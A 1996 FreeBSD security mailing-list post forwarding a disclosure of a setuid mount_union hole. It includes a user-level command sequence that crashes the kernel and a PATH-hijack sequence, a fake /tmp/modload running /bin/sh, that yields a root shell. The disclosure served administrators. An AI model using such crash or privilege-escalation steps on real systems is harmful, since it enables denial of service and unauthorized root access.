From owner-freebsd-security Fri May 17 16:45:35 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA01126 for security-outgoing; Fri, 17 May 1996 16:45:35 -0700 (PDT) Received: from io.org (io.org [198.133.36.1]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id QAA01121 for ; Fri, 17 May 1996 16:45:33 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by io.org (8.6.12/8.6.12) with SMTP id TAA14734 for ; Fri, 17 May 1996 19:45:27 -0400 Date: Fri, 17 May 1996 19:44:25 -0400 (EDT) From: Brian Tao To: FREEBSD-SECURITY-L Subject: SECURITY BUG in FreeBSD (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Here's the same bug reported by someone else on the -hackers list, with both the kernel panic and root shell exploits. -- Brian Tao (BT300, taob@io.org, taob@ican.net) Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" ---------- Forwarded message ---------- Date: Fri, 17 May 1996 19:06:03 -0400 (EDT) From: Dan Polivy To: freebsd-hackers@freebsd.org Subject: SECURITY BUG in FreeBSD (fwd) I came across this in my travels...thought you guys may be interesting (in case you didn't already know)...It's worked for me on my -RELEASE, and -STABLE machines...dunno about any others... Dan +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ | JRI HIS MIS Systems Administrator/Tech Support | |////////////////////////////////////////////////////////////////| | danp@busstop.org dpolivy@jri.org danp@library.pride.net | |\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\| | Check out JRI's Homepage at http://www.jri.org | |////////////////////////////////////////////////////////////////| | EMail health@jri.org or check out http://www.jri.org/jrihealth | +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+ --------------------------------- Hi! FreeBSD has a security hole... dangerous is mount_union if suid is set vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT probably FreeBSD 2.1 STABLE is not vulnerable to crash system (as a normal user) try this: mkdir a mkdir b mount_union ~/a ~/b mount_union -b ~/a ~/b to got euid try this: export PATH=/tmp:$PATH #if zsh, of course echo /bin/sh >/tmp/modload chmod +x /tmp/modload mount_union /dir1 /dir2 and You are root! Hole found by Adam Kubicki Best wishes Chris Labanowski KL ----------------------------------